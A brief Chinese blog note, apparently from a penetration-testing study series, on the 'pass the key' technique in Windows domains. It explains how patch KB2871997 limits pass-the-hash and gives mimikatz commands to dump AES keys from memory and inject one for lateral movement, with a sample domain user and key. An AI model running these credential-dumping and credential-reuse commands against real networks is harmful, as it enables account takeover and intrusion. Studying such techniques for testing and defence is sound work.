域渗透:ptk(pass the key)
前言:自己還是不太懂,pass the key 和 pass the hash的區(qū)別,以后再看吧
在 WinXP/2003/Vista/2008 ,以及未打 kb2871997 補(bǔ)丁之前(AES 不可用或不可替代)的 Win7/2008r2/8/2012 中強(qiáng)制使用 NTLM 哈希。
AES 密鑰只有在 8.1/2012r2 和打了 kb2871997 補(bǔ)丁的 7/2008r2/8/2012 中才可以替換,在這種情況下,你可以避免使用 NTLM 哈希。
KB2871997:禁止本地管理員賬戶用于遠(yuǎn)程連接,這樣就無(wú)法以本地管理員用戶的權(quán)限執(zhí)行wmi、psexec、schtasks、at和訪問(wèn)文件共享。
這個(gè)補(bǔ)丁發(fā)布后常規(guī)的Pass The Hash已經(jīng)無(wú)法成功,唯獨(dú)默認(rèn)的 Administrator (SID 500)賬號(hào)例外,利用這個(gè)賬號(hào)仍可以進(jìn)行Pass The Hash遠(yuǎn)程連接,即使administrator修改了名字
但是還可以通過(guò)AES密鑰來(lái)替代ntlm進(jìn)行橫向的操作(自己講的也是一知半解的,這個(gè)自己只會(huì)用 不懂原理)
1、獲取aes key
mimikatz命令為:
mimikatz "log" "privilege::debug" "sekurlsa::ekeys" exit
2、注入aes key:
mimikatz命令為:
mimikatz "privilege::debug" "sekurlsa::pth /user:mary /domain:god.org /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288"
這里需要注意:pth dir \xxx.xxx.xxx.xxxc$ 如果直接用IP會(huì)提示用戶或密碼不正確,直接使用機(jī)器名即可 dir \機(jī)器名c$
總結(jié):對(duì)于8.1/2012r2,安裝補(bǔ)丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NT hash
參考文章:http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
參考文章:http://www.tiejiang.org/23508.html
參考文章:https://www.cnblogs.com/bmjoker/p/10355979.html
總結(jié)
以上是生活随笔為你收集整理的域渗透:ptk(pass the key)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 寂静岭pt剧情是什么(《寂静岭2》超清高
- 下一篇: Windows系统封装初始化工具sysp